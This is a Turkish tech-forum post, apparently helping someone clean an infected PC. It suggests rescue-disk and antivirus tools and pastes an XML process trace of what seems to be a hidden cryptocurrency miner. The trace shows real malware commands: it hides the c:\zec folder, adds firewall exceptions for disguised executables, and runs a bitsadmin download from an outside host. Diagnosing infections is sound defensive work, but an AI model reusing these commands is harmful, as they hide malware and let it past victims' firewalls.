Türkçesever
Hectopat
- Katılım
- 12 Eylül 2016
- Mesajlar
- 630
Arkadaş Bitdefender Rescue Disk oluştursun ya da RKill ve sonrasında antivirüs kullansın. HerdProtect raporu oluşturmasında da fayda var.
<Process Name="C:\Windows\System32\attrib.exe" PID="2832" StartedInTraceSec="47.907">
<StartTime>2017/05/20:14:10:25.6971698</StartTime>
<CommandLine><![CDATA[attrib +s +a +h c:\zec]]></CommandLine>
<DiskUsage Units="bytes">54784</DiskUsage>
<CpuUsage Units="us">0</CpuUsage>
<ParentPID>7252</ParentPID>
<ParentStartTime>2017/05/20:14:10:19.4315463</ParentStartTime>
<ParentName>cmd.exe</ParentName>
</Process>
<StartTime>2017/05/20:14:10:19.4315463</StartTime>
<CommandLine><![CDATA[C:\Windows\system32\cmd.exe /c c:\zec\start.bat]]></CommandLine>
<DiskUsage Units="bytes">0</DiskUsage>
<CpuUsage Units="us">30589</CpuUsage>
<ParentPID>5712</ParentPID>
<ParentStartTime>2017/05/20:14:10:03.9668622</ParentStartTime>
<ParentName>nircmd.exe</ParentName>
</Process>
<Process Name="C:\Windows\System32\cmd.exe" PID="7252" StartedInTraceSec="41.642">
<Process Name="C:\Windows\System32\conhost.exe" PID="7364" StartedInTraceSec="41.926">
<StartTime>2017/05/20:14:10:19.7159901</StartTime>
<CommandLine><![CDATA[\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1]]></CommandLine>
<DiskUsage Units="bytes">4096</DiskUsage>
<CpuUsage Units="us">18788</CpuUsage>
<ParentPID>7252</ParentPID>
<ParentStartTime>2017/05/20:14:10:19.4315463</ParentStartTime>
<ParentName>cmd.exe</ParentName>
</Process>
<Process Name="C:\Windows\System32\conhost.exe" PID="9196" StartedInTraceSec="56.451">
<StartTime>2017/05/20:14:10:34.2408881</StartTime>
<CommandLine><![CDATA[\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1]]></CommandLine>
<DiskUsage Units="bytes">0</DiskUsage>
<CpuUsage Units="us">33777</CpuUsage>
<ParentPID>9188</ParentPID>
<ParentStartTime>2017/05/20:14:10:34.1200329</ParentStartTime>
<ParentName>OAWrapper.exe</ParentName>
</Process>
<Process Name="C:\Windows\System32\attrib.exe" PID="7308" StartedInTraceSec="50.710">
<StartTime>2017/05/20:14:10:28.4999577</StartTime>
<CommandLine><![CDATA[attrib +s +a +h c:\zec\*]]></CommandLine>
<DiskUsage Units="bytes">0</DiskUsage>
<CpuUsage Units="us">5558</CpuUsage>
<ParentPID>7252</ParentPID>
<ParentStartTime>2017/05/20:14:10:19.4315463</ParentStartTime>
<ParentName>cmd.exe</ParentName>
</Process>
<Process Name="C:\Windows\System32\netsh.exe" PID="7384" StartedInTraceSec="64.034">
<StartTime>2017/05/20:14:10:41.8241590</StartTime>
<CommandLine><![CDATA[netsh advfirewall firewall add rule name="WePrint" dir=in action=allow profile=any description="WePrint Firewall Exception" program="C:\zec\taskmgr.exe"]]></CommandLine>
<DiskUsage Units="bytes">611328</DiskUsage>
<CpuUsage Units="us">6175</CpuUsage>
<ParentPID>7252</ParentPID>
<ParentStartTime>2017/05/20:14:10:19.4315463</ParentStartTime>
<ParentName>cmd.exe</ParentName>
</Process>
<Process Name="C:\Windows\System32\netsh.exe" PID="8928" StartedInTraceSec="65.598">
<StartTime>2017/05/20:14:10:43.3880496</StartTime>
<CommandLine><![CDATA[netsh advfirewall firewall add rule name="WePrint" dir=out action=allow profile=any description="WePrint Firewall Exception" program="C:\zec\svchosts.exe"]]></CommandLine>
<DiskUsage Units="bytes">0</DiskUsage>
<CpuUsage Units="us">3033</CpuUsage>
<ParentPID>7252</ParentPID>
<ParentStartTime>2017/05/20:14:10:19.4315463</ParentStartTime>
<ParentName>cmd.exe</ParentName>
</Process>
<Process Name="C:\Windows\System32\bitsadmin.exe" PID="8536" StartedInTraceSec="69.697">
<StartTime>2017/05/20:14:10:47.4872436</StartTime>
<CommandLine><![CDATA[Bitsadmin.exe /transfer "MyZec" http://guardia.us/MyZec.txt C:\zec\config.txt]]></CommandLine>
<DiskUsage Units="bytes">0</DiskUsage>
<CpuUsage Units="us">7057</CpuUsage>
<ParentPID>7252</ParentPID>
<ParentStartTime>2017/05/20:14:10:19.4315463</ParentStartTime>
<ParentName>cmd.exe</ParentName>
</Process>
Madencilik olayını gizliden gizliye kullanan Türkiye'de bir kesim insan var.
Bu sitenin çalışmasını sağlamak için gerekli çerezleri ve deneyiminizi iyileştirmek için isteğe bağlı çerezleri kullanıyoruz.